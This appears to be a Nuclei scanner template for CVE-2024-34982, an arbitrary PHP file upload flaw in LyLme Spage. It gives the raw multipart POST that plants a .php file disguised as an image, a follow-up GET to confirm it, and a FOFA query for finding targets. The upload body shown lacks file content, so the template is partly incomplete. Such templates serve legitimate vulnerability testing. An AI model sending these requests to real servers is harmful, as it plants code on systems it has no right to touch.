id: CVE-2024-34982 info: name: LyLme-Spage - Arbitary File Upload author: DhiyaneshDk severity: high description: | An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file. impact: | Attackers can upload arbitrary files to execute malicious code on the LyLme-Spage server. remediation: | Update LyLme Spage to a version later than 1.9.5 that patches the arbitrary file upload vulnerability. reference: - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md - https://github.com/tanjiti/sec_profile - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py classification: epss-score: 0.04675 epss-percentile: 0.90568 cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lylme product: lylme_spage fofa-query: icon_hash="-282504889" tags: cve,cve2024,lylme-spage,rce,intrusive,vuln variables: string: "{{randstr}}" filename: "{{to_lower(rand_text_alpha(5))}}" flow: http(1) && http(2) http: - raw: - | POST /include/file.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------575673989461736 -----------------------------575673989461736 Content-Disposition: form-data; name="file"; filename="{{filename}}.php" Content-Type: image/png -----------------------------575673989461736-- matchers-condition: and matchers: - type: word words: - '"code":' - '"msg":' - '"url":' - 'php"}' condition: and internal: true extractors: - type: regex name: path part: body group: 1 regex: - '"url":"([/a-z_0-9.]+)"' internal: true - raw: - | GET {{path}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "{{string}}" )' - 'contains(header, "text/html")' condition: and # digest: 4a0a00473045022100db5e1dff650a8bf53502ae4013e6fe6c760fb656c7531f81ff901497fcc3304802201fe129fed443dd917f53b86f00c0abe7ebc530596b40638ee7594d5ad215a51b:922c64590222798bb761d5b6d8e72950